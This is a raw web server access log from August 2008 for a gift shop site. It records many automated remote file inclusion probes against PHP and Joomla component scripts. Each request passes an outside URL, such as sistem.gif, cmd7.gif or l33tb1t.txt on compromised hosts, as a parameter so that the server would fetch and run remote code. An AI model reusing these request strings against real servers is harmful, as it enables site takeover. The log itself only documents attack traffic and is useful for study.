213.165.88.84 - - [27/Aug/2008:06:21:02 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:21:02 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:21:57 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:21:58 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:06:22:37 -0700] "GET /errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:22:52 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
89.111.176.9 - - [27/Aug/2008:06:23:01 -0700] "GET //common/db.php?commonpath=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
195.199.190.37 - - [27/Aug/2008:06:23:23 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
195.199.190.37 - - [27/Aug/2008:06:23:24 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
195.199.190.37 - - [27/Aug/2008:06:23:24 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:23:37 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
87.119.195.22 - - [27/Aug/2008:06:24:00 -0700] "GET /logs/errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:24:00 -0700] "GET /logs///?custompluginfile[]=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 200 4948 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.119.195.22 - - [27/Aug/2008:06:24:00 -0700] "GET /errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:24:00 -0700] "GET ///?custompluginfile[]=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 200 780 "-" "libwww-perl/5.803" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:24:07 -0700] "GET /logs/access_080727.log//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:24:08 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:24:08 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
74.6.17.176 - - [27/Aug/2008:06:24:17 -0700] "GET /logs/access.log HTTP/1.0" 200 80036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:24:26 -0700] "GET /logs/access_080710.log//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:24:27 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:24:27 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:06:24:32 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:06:24:32 -0700] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:06:24:32 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:24:39 -0700] "GET ///?custompluginfile[]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:24:39 -0700] "GET /logs///?custompluginfile[]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:25:49 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:25:49 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:25:58 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:26:03 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:26:05 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:26:19 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:26:56 -0700] "GET /logs///?custompluginfile[]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:26:56 -0700] "GET ///?custompluginfile[]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 780 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:27:23 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:27:24 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:27:34 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:27:34 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:27:35 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
89.111.176.9 - - [27/Aug/2008:06:27:36 -0700] "GET /logs//common/db.php?commonpath=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.111.176.9 - - [27/Aug/2008:06:27:36 -0700] "GET //common/db.php?commonpath=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:29:22 -0700] "GET /logs/index3.php?_REQUEST=&_REQUEST%5boption%5d=com_dbquery&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:29:22 -0700] "GET /index3.php?_REQUEST=&_REQUEST%5boption%5d=com_dbquery&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.106.212.158 - - [27/Aug/2008:06:29:27 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.morningstargifts.com"
87.106.212.158 - - [27/Aug/2008:06:29:27 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:29:28 -0700] "GET /logs/index3.php?_REQUEST=&_REQUEST%5boption%5d=com_dbquery&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:29:28 -0700] "GET /index3.php?_REQUEST=&_REQUEST%5boption%5d=com_dbquery&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:06:30:22 -0700] "GET /logs/access.log/errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:06:30:22 -0700] "GET /errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:06:30:23 -0700] "GET /logs/errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
195.114.29.130 - - [27/Aug/2008:06:32:39 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.morningstargifts.com"
195.114.29.130 - - [27/Aug/2008:06:32:39 -0700] "GET ///vwar/backup/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:32:57 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:32:58 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:32:58 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
65.38.169.228 - - [27/Aug/2008:06:33:22 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
65.38.169.228 - - [27/Aug/2008:06:33:22 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.slupskie-studia-filozoficzne.apsl.edu.pl/cache/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:34:26 -0700] "GET /logs//include/write.php?dir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:34:26 -0700] "GET //include/write.php?dir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
83.240.154.200 - - [27/Aug/2008:06:34:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.morningstargifts.com"
83.240.154.200 - - [27/Aug/2008:06:34:37 -0700] "GET /phphtml.php?htmlclass_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:34:39 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:34:40 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:34:40 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
147.102.106.10 - - [27/Aug/2008:06:34:46 -0700] "GET /logs//searcharrays.php?addonDir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "morningstargifts.com"
147.102.106.10 - - [27/Aug/2008:06:34:46 -0700] "GET //searcharrays.php?addonDir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:34:41 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:35:36 -0700] "GET /logs/access.log/?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:35:37 -0700] "GET /logs/access.log/?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:35:37 -0700] "GET /?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:35:37 -0700] "GET /?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:35:37 -0700] "GET /logs/?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:35:37 -0700] "GET /logs/?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "morningstargifts.com"
89.111.184.180 - - [27/Aug/2008:06:36:08 -0700] "GET //index2.php?DOCUMENT_ROOT=http://titureddo.altervista.org/vacanze/pinogino.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.morningstargifts.com"
89.111.184.180 - - [27/Aug/2008:06:36:08 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://titureddo.altervista.org/vacanze/pinogino.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.morningstargifts.com"
204.214.80.199 - - [27/Aug/2008:06:36:12 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://borneo.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:06:36:53 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:06:36:53 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:37:17 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:37:18 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:37:18 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:37:37 -0700] "GET /logs/access_080727.log//include/write.php?dir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:37:37 -0700] "GET //include/write.php?dir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:37:38 -0700] "GET /logs//include/write.php?dir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:06:37:44 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
70.86.37.2 - - [27/Aug/2008:06:37:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.morningstargifts.com"
70.86.37.2 - - [27/Aug/2008:06:37:53 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.morningstargifts.com"
128.121.21.48 - - [27/Aug/2008:06:38:10 -0700] "GET /scanhttp://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "morningstargifts.com"
128.121.21.48 - - [27/Aug/2008:06:38:05 -0700] "GET /logs/scanhttp://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:38:06 -0700] "GET /logs/access_080727.log//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:38:07 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:38:07 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:06:39:15 -0700] "GET /logs/errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:06:39:15 -0700] "GET /errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:06:39:15 -0700] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:39:24 -0700] "GET //include/write.php?dir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
128.121.21.48 - - [27/Aug/2008:06:39:36 -0700] "GET /scanhttp://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.morningstargifts.com"
128.121.21.48 - - [27/Aug/2008:06:39:36 -0700] "GET /logs/scanhttp://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.morningstargifts.com"
202.145.97.59 - - [27/Aug/2008:06:39:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:40:40 -0700] "GET /logs/access_080606.log//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:40:40 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
213.165.88.84 - - [27/Aug/2008:06:40:41 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:06:41:02 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
